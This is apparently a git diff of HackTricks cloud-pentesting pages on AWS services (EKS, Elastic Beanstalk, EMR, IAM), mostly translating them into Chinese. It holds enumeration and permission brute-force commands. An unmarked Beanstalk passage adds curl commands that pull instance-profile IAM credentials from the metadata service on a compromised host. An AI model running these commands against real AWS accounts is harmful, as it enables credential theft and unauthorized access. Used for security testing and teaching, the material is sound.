请注意,即使尝试挂载访问点,您仍然需要能够**通过网络联系NFS服务**,如果EFS有文件系统**策略**,您需要**足够的IAM权限**来挂载它。 -Access points can be used for the following purposes: +访问点可以用于以下目的: -- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions. -- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification. -- **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications. +- **简化权限管理**:通过为每个访问点定义一个POSIX用户和组,您可以轻松管理不同应用程序或用户的访问权限,而无需修改底层文件系统的权限。 +- **强制根目录**:访问点可以限制对EFS文件系统中特定目录的访问,确保每个应用程序或用户在其指定的文件夹内操作。这有助于防止意外的数据泄露或修改。 +- **更容易的文件系统访问**:访问点可以与AWS Lambda函数或AWS Fargate任务关联,简化无服务器和容器化应用程序的文件系统访问。 ## Privesc @@ -142,7 +132,3 @@ Access points can be used for the following purposes: {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md index a7ead6d10..3102a382f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md @@ -4,17 +4,16 @@ ## EKS -Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. 
+亚马逊弹性Kubernetes服务(Amazon EKS)旨在消除用户安装、操作和管理自己的Kubernetes控制平面或节点的需求。相反,Amazon EKS 管理这些组件,提供了一种简化的方式来在AWS上使用Kubernetes部署、管理和扩展容器化应用程序。 -Key aspects of Amazon EKS include: +Amazon EKS的关键方面包括: -1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. -2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. -3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. -4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. +1. **托管Kubernetes控制平面**:Amazon EKS自动化关键任务,如修补、节点配置和更新。 +2. **与AWS服务的集成**:它与计算、存储、数据库和安全的AWS服务无缝集成。 +3. **可扩展性和安全性**:Amazon EKS旨在高度可用和安全,提供自动扩展和设计隔离等功能。 +4. **与Kubernetes的兼容性**:在Amazon EKS上运行的应用程序与在任何标准Kubernetes环境中运行的应用程序完全兼容。 #### Enumeration - ```bash aws eks list-clusters aws eks describe-cluster --name @@ -32,19 +31,14 @@ aws eks describe-nodegroup --cluster-name --nodegroup-name aws eks list-updates --name aws eks describe-update --name --update-id ``` - -#### Post Exploitation +#### 后期利用 {{#ref}} ../aws-post-exploitation/aws-eks-post-exploitation.md {{#endref}} -## References +## 参考 - [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md index 980504dac..517964bf7 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md @@ -4,70 +4,69 @@ ## Elastic Beanstalk -Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS. +亚马逊 Elastic Beanstalk 提供了一个简化的平台,用于 **部署、管理和扩展 Web 应用程序和服务**。它支持多种编程语言和框架,如 Java、.NET、PHP、Node.js、Python、Ruby 和 Go,以及 Docker 容器。该服务与广泛使用的服务器兼容,包括 Apache、Nginx、Passenger 和 IIS。 -Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code. +Elastic Beanstalk 提供了一种简单灵活的方式来 **将您的应用程序部署到 AWS 云**,无需担心底层基础设施。它 **自动** 处理容量 **配置**、负载 **均衡**、**扩展** 和应用程序健康 **监控** 的细节,让您专注于编写和部署代码。 -The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2: +Elastic Beanstalk 创建的基础设施由 **自动扩展** 组在 **EC2** 中管理(带有负载均衡器)。这意味着,最终,如果您 **妥协主机**,您应该了解 EC2: {{#ref}} aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -Moreover, if Docker is used, it’s possible to use **ECS**. 
+此外,如果使用 Docker,可以使用 **ECS**。 {{#ref}} aws-eks-enum.md {{#endref}} -### Application & Environments +### 应用程序与环境 -In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process. +在 AWS Elastic Beanstalk 中,“应用程序”和“环境”的概念服务于不同的目的,并在部署过程中具有不同的角色。 -#### Application +#### 应用程序 -- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity. -- When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources. -- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments. +- Elastic Beanstalk 中的应用程序是一个 **逻辑容器,用于存放您的应用程序源代码、环境和配置**。它将不同版本的应用程序代码组合在一起,并允许您将其作为一个实体进行管理。 +- 创建应用程序时,您提供一个名称和 **描述,但此时不会配置任何资源**。这只是组织和管理代码及相关资源的一种方式。 +- 您可以在一个应用程序中拥有 **多个应用程序版本**。每个版本对应于代码的特定发布,可以部署到一个或多个环境中。 -#### Environment +#### 环境 -- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration. -- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production. -- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings. +- 环境是一个 **在 AWS 基础设施上运行的应用程序的配置实例**。它是 **您的应用程序代码被部署和执行的地方**。Elastic Beanstalk 根据环境配置配置所需的资源(例如,EC2 实例、负载均衡器、自动扩展组、数据库)。 +- **每个环境运行您应用程序的单个版本**,您可以为不同的目的(例如开发、测试、预发布和生产)拥有多个环境。 +- 创建环境时,您选择一个平台(例如 Java、.NET、Node.js 等)和环境类型(例如 Web 服务器或工作者)。您还可以自定义环境配置,以控制基础设施和应用程序设置的各个方面。 -### 2 types of Environments +### 2 种环境类型 -1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. The web server environment provisions resources such as **EC2 instances, load balancers, and auto-scaling** groups to handle incoming traffic, manage capacity, and ensure the application's high availability. -2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and auto-scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes. +1. **Web 服务器环境**:旨在 **托管和提供 Web 应用程序和 API**。这些应用程序通常处理传入的 HTTP/HTTPS 请求。Web 服务器环境配置资源,如 **EC2 实例、负载均衡器和自动扩展** 组,以处理传入流量、管理容量并确保应用程序的高可用性。 +2. 
**工作者环境**:旨在处理 **后台任务**,这些任务通常是耗时或资源密集型的操作,不需要立即响应客户端。工作者环境配置资源,如 **EC2 实例和自动扩展组**,但它 **没有负载均衡器**,因为它不直接处理 HTTP/HTTPS 请求。相反,它从 **Amazon Simple Queue Service (SQS) 队列** 中消费任务,该队列充当工作者环境与其处理的任务之间的缓冲区。 -### Security +### 安全 -When creating an App in Beanstalk there are 3 very important security options to choose: +在 Beanstalk 中创建应用时,有 3 个非常重要的安全选项可供选择: -- **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app -- **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**) - - The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier). -- **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role. - - This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) +- **EC2 密钥对**:这将是能够访问运行应用的 EC2 实例的 **SSH 密钥**。 +- **IAM 实例配置文件**:这是实例将拥有的 **实例配置文件**(**IAM 权限**)。 +- 自动生成的角色称为 **`aws-elasticbeanstalk-ec2-role`**,并对所有 ECS、所有 SQS、DynamoDB elasticbeanstalk 和 elasticbeanstalk S3 拥有一些有趣的访问权限,使用 AWS 管理的策略:[AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier)、[AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker)、[AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier)。 +- **服务角色**:这是 **AWS 服务** 将用于执行所有所需操作的 **角色**。据我所知,普通 AWS 用户无法访问该角色。 +- AWS 生成的角色称为 **`aws-elasticbeanstalk-service-role`**,并使用 AWS 管理的策略 [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) 和 [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) -By default **metadata version 1 is disabled**: +默认情况下 **元数据版本 1 被禁用**:
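From a compromised Beanstalk instance you can quickly verify whether IMDSv1 is really disabled and, either way, pull the instance profile credentials through IMDSv2. A rough sketch, assuming the default `aws-elasticbeanstalk-ec2-role` profile mentioned above is in use:

```bash
# IMDSv1 (no token). If this answers, metadata version 1 is still enabled
curl -s --max-time 3 http://169.254.169.254/latest/meta-data/ && echo "[!] IMDSv1 enabled"

# IMDSv2 (token based) - dump the credentials of the instance profile
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 300")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role"
```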
-### Exposure +### 暴露 -Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticbeanstalk--`**(if it was created in the AWS console). Inside this bucket you will find the uploaded **source code of the application**. +Beanstalk 数据存储在一个 **S3 存储桶** 中,名称为 **`elasticbeanstalk--`**(如果是在 AWS 控制台中创建的)。在此存储桶中,您将找到上传的 **应用程序源代码**。 -The **URL** of the created webpage is **`http://-env...elasticbeanstalk.com/`** +创建的网页的 **URL** 为 **`http://-env...elasticbeanstalk.com/`** > [!WARNING] -> If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it +> 如果您获得 **读取访问权限**,您可以 **读取源代码**,甚至找到 **敏感凭据**。 > -> if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed. - -### Enumeration +> 如果您获得 **写入访问权限**,您可以 **修改源代码**,以 **妥协** 应用程序下次执行时使用的 **IAM 角色**。 +### 枚举 ```bash # Find S3 bucket ACCOUNT_NUMBER= @@ -85,33 +84,28 @@ aws elasticbeanstalk describe-instances-health --environment-name # G # Get events aws elasticbeanstalk describe-events ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-elastic-beanstalk-persistence.md {{#endref}} -### Privesc +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md {{#endref}} -### Post Exploitation +### 利用后的操作 {{#ref}} ../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md index 6305fcc91..eb00aa2d7 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md @@ -4,10 +4,9 @@ ## ElastiCache -AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**. 
+AWS ElastiCache 是一个完全**托管的内存数据存储和缓存服务**,为应用程序提供高性能、低延迟和可扩展的解决方案。它支持两个流行的开源内存引擎:**Redis 和 Memcached**。ElastiCache **简化**了这些引擎的**设置**、**管理**和**维护**,使开发人员能够卸载诸如配置、打补丁、监控和**备份**等耗时任务。 ### Enumeration - ```bash # ElastiCache clusters ## Check the SecurityGroups to later check who can access @@ -39,11 +38,6 @@ aws elasticache describe-users # List ElastiCache events aws elasticache describe-events ``` - ### Privesc (TODO) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md index b05012f3e..22bcfb484 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md @@ -4,38 +4,37 @@ ## EMR -AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. +AWS的弹性MapReduce(EMR)服务,从版本4.8.0开始,引入了**安全配置**功能,通过允许用户为EMR集群中的静态和动态数据指定加密设置,从而增强数据保护。EMR集群是可扩展的EC2实例组,旨在处理大数据框架,如Apache Hadoop和Spark。 -Key characteristics include: +主要特点包括: -- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: - - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. - - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: - - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. - - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. -- **Encryption in Transit**: Focuses on securing data during transfer. Options include: - - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: - - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. - - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. +- **集群加密默认**:默认情况下,集群内的静态数据未加密。然而,启用加密可以访问多个功能: +- **Linux统一密钥设置**:加密EBS集群卷。用户可以选择AWS密钥管理服务(KMS)或自定义密钥提供者。 +- **开源HDFS加密**:为Hadoop提供两种加密选项: +- 安全Hadoop RPC(远程过程调用),设置为隐私,利用简单身份验证安全层。 +- HDFS块传输加密,设置为true,使用AES-256算法。 +- **传输中的加密**:专注于在传输过程中保护数据。选项包括: +- **开源传输层安全性(TLS)**:通过选择证书提供者可以启用加密: +- **PEM**:需要手动创建并将PEM证书打包到zip文件中,从S3桶中引用。 +- **自定义**:涉及添加自定义Java类作为证书提供者,提供加密工件。 -Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: +一旦将TLS证书提供者集成到安全配置中,可以激活以下特定于应用程序的加密功能,具体取决于EMR版本: -- **Hadoop**: - - Might reduce encrypted shuffle using TLS. - - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. -- **Presto** (EMR version 5.6.0+): - - Internal communication between Presto nodes is secured using SSL and TLS. -- **Tez Shuffle Handler**: - - Utilizes TLS for encryption. -- **Spark**: - - Employs TLS for the Akka protocol. - - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. 
- - External shuffle service is secured with the Simple Authentication Security Layer. +- **Hadoop**: +- 可能会减少使用TLS的加密洗牌。 +- 使用简单身份验证安全层的安全Hadoop RPC和使用AES-256的HDFS块传输在静态加密时激活。 +- **Presto**(EMR版本5.6.0+): +- Presto节点之间的内部通信使用SSL和TLS进行安全保护。 +- **Tez Shuffle Handler**: +- 使用TLS进行加密。 +- **Spark**: +- 对Akka协议使用TLS。 +- 对块传输服务使用简单身份验证安全层和3DES。 +- 外部洗牌服务使用简单身份验证安全层进行保护。 -These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. +这些功能共同增强了EMR集群的安全态势,特别是在存储和传输阶段的数据保护方面。 #### Enumeration - ```bash aws emr list-clusters aws emr describe-cluster --cluster-id @@ -46,19 +45,14 @@ aws emr list-notebook-executions aws emr list-security-configurations aws emr list-studios #Get studio URLs ``` - -#### Privesc +#### 提权 {{#ref}} ../aws-privilege-escalation/aws-emr-privesc.md {{#endref}} -## References +## 参考 - [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md index 7a430cc17..b0f8a4806 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md @@ -1,20 +1,20 @@ -# AWS - IAM, Identity Center & SSO Enum +# AWS - IAM, 身份中心与 SSO 枚举 {{#include ../../../banners/hacktricks-training.md}} ## IAM -You can find a **description of IAM** in: +您可以在以下位置找到 **IAM 的描述**: {{#ref}} ../aws-basic-information/ {{#endref}} -### Enumeration +### 枚举 -Main permissions needed: +所需的主要权限: -- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion` +- `iam:ListPolicies`, `iam:GetPolicy` 和 `iam:GetPolicyVersion` - `iam:ListRoles` - `iam:ListUsers` - `iam:ListGroups` @@ -22,10 +22,9 @@ Main permissions needed: - `iam:ListAttachedUserPolicies` - `iam:ListAttachedRolePolicies` - `iam:ListAttachedGroupPolicies` -- `iam:ListUserPolicies` and `iam:GetUserPolicy` -- `iam:ListGroupPolicies` and `iam:GetGroupPolicy` -- `iam:ListRolePolicies` and `iam:GetRolePolicy` - +- `iam:ListUserPolicies` 和 `iam:GetUserPolicy` +- `iam:ListGroupPolicies` 和 `iam:GetGroupPolicy` +- `iam:ListRolePolicies` 和 `iam:GetRolePolicy` ```bash # All IAMs ## Retrieves information about all IAM users, groups, roles, and policies @@ -89,64 +88,54 @@ aws iam get-account-password-policy aws iam list-mfa-devices aws iam list-virtual-mfa-devices ``` +### 权限暴力破解 -### Permissions Brute Force - -If you are interested in your own permissions but you don't have access to query IAM you could always brute-force them. +如果您对自己的权限感兴趣,但没有权限查询 IAM,您可以尝试暴力破解它们。 #### bf-aws-permissions -The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**. 
- +工具 [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) 只是一个 bash 脚本,它将使用指定的配置文件运行所有可以通过 `aws` cli 帮助信息找到的 **`list*`, `describe*`, `get*`** 操作,并 **返回成功的执行结果**。 ```bash # Bruteforce permissions bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt ``` - #### bf-aws-perms-simulate -The tool [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) can find your current permission (or the ones of other principals) if you have the permission **`iam:SimulatePrincipalPolicy`** - +工具 [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) 可以找到您当前的权限(或其他主体的权限),前提是您拥有权限 **`iam:SimulatePrincipalPolicy`** ```bash # Ask for permissions python3 aws_permissions_checker.py --profile [--arn ] ``` - #### Perms2ManagedPolicies -If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**. - +如果你发现**你的用户拥有某些权限**,并且你认为这些权限是由**托管的 AWS 角色**授予的(而不是自定义角色)。你可以使用工具 [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) 来检查所有**授予你发现的权限的 AWS 托管角色**。 ```bash # Run example with my profile python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt ``` - > [!WARNING] -> It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example. +> 如果您看到**您对未使用的服务拥有权限**,则可以“知道”您拥有的权限是由AWS托管角色授予的。 #### Cloudtrail2IAM -[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**. - +[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) 是一个Python工具,用于分析**AWS CloudTrail日志以提取和总结**所有人或特定用户或角色所执行的操作。该工具将**解析指定存储桶中的每个cloudtrail日志**。 ```bash git clone https://github.com/carlospolop/Cloudtrail2IAM cd Cloudtrail2IAM pip install -r requirements.txt python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS] ``` - > [!WARNING] -> If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who. +> 如果你找到 .tfstate(Terraform 状态文件)或 CloudFormation 文件(这些通常是位于以 cf-templates 为前缀的桶中的 yaml 文件),你也可以读取它们以查找 aws 配置并找出哪些权限被分配给了谁。 #### enumerate-iam -To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) you first need to download all the API AWS endpoints, from those the script **`generate_bruteforce_tests.py`** will get all the **"list\_", "describe\_", and "get\_" endpoints.** And finally, it will try to **access them** with the given credentials and **indicate if it worked**. 
+要使用工具 [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam),你首先需要下载所有的 API AWS 端点,从中脚本 **`generate_bruteforce_tests.py`** 将获取所有的 **"list\_", "describe\_", 和 "get\_" 端点。** 最后,它将尝试 **使用给定的凭据访问它们** 并 **指示是否成功**。 -(In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that). +(根据我的经验,**该工具在某些时候会挂起**, [**查看此修复**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) 尝试修复这个问题)。 > [!WARNING] -> In my experience this tool is like the previous one but working worse and checking less permissions - +> 根据我的经验,这个工具与前一个工具类似,但工作效果更差,检查的权限更少。 ```bash # Install tool git clone git@github.com:andresriancho/enumerate-iam.git @@ -163,11 +152,9 @@ cd .. # Enumerate permissions python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION] ``` - #### weirdAAL -You could also use the tool [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). This tool will check **several common operations on several common services** (will check some enumeration permissions and also some privesc permissions). But it will only check the coded checks (the only way to check more stuff if coding more tests). - +您还可以使用工具 [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki)。该工具将检查 **多个常见服务上的几个常见操作**(将检查一些枚举权限和一些权限提升权限)。但它只会检查编码的检查(检查更多内容的唯一方法是编写更多测试)。 ```bash # Install git clone https://github.com/carnal0wnage/weirdAAL.git @@ -191,12 +178,10 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions # [+] elbv2 Actions allowed are [+] # ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups'] ``` - -#### Hardening Tools to BF permissions +#### 加固工具以 BF 权限 {{#tabs }} {{#tab name="CloudSploit" }} - ```bash # Export env variables ./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json @@ -207,11 +192,9 @@ jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json # Get services by regions jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json ``` - {{#endtab }} {{#tab name="SteamPipe" }} - ```bash # https://github.com/turbot/steampipe-mod-aws-insights steampipe check all --export=json @@ -220,50 +203,48 @@ steampipe check all --export=json # In this case you cannot output to JSON, so heck it in the dashboard steampipe dashboard ``` - {{#endtab }} {{#endtabs }} #### \ -Neither of the previous tools is capable of checking close to all permissions, so if you know a better tool send a PR! +之前的工具都无法检查所有权限,因此如果你知道更好的工具,请发送 PR! 
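If you'd rather not run any of those tools, the underlying idea is easy to reproduce by hand: fire a handful of harmless read-only calls with the target credentials and keep the ones that don't fail. A minimal sketch (the profile name and the list of commands are just examples):

```bash
PROFILE=default  # assumption: the target credentials are configured in this profile
for cmd in "sts get-caller-identity" "iam list-users" "s3api list-buckets" \
           "ec2 describe-instances" "lambda list-functions" "secretsmanager list-secrets"; do
  if aws --profile "$PROFILE" $cmd >/dev/null 2>&1; then
    echo "[+] allowed: aws $cmd"
  else
    echo "[-] denied:  aws $cmd"
  fi
done
```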
-### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md {{#endref}} -### Privilege Escalation +### 权限提升 -In the following page you can check how to **abuse IAM permissions to escalate privileges**: +在以下页面中,你可以查看如何**滥用 IAM 权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-iam-privesc.md {{#endref}} -### IAM Post Exploitation +### IAM 后期利用 {{#ref}} ../aws-post-exploitation/aws-iam-post-exploitation.md {{#endref}} -### IAM Persistence +### IAM 持久性 {{#ref}} ../aws-persistence/aws-iam-persistence.md {{#endref}} -## IAM Identity Center +## IAM 身份中心 -You can find a **description of IAM Identity Center** in: +你可以在以下位置找到**IAM 身份中心的描述**: {{#ref}} ../aws-basic-information/ {{#endref}} -### Connect via SSO with CLI - +### 通过 SSO 使用 CLI 连接 ```bash # Connect with sso via CLI aws configure sso aws configure sso @@ -274,20 +255,18 @@ sso_account_id = sso_role_name = AdministratorAccess sso_region = us-east-1 ``` - ### Enumeration -The main elements of the Identity Center are: +身份中心的主要元素包括: -- Users and groups -- Permission Sets: Have policies attached -- AWS Accounts +- 用户和组 +- 权限集:附加了策略 +- AWS 账户 -Then, relationships are created so users/groups have Permission Sets over AWS Account. +然后,创建关系,使用户/组对 AWS 账户拥有权限集。 > [!NOTE] -> Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there). - +> 请注意,有三种方法可以将策略附加到权限集。附加 AWS 管理的策略、客户管理的策略(这些策略需要在权限集影响的所有账户中创建)和内联策略(在此定义)。 ```bash # Check if IAM Identity Center is used aws sso-admin list-instances @@ -321,11 +300,9 @@ aws identitystore list-group-memberships --identity-store-id --group- ## Get memberships or a user or a group aws identitystore 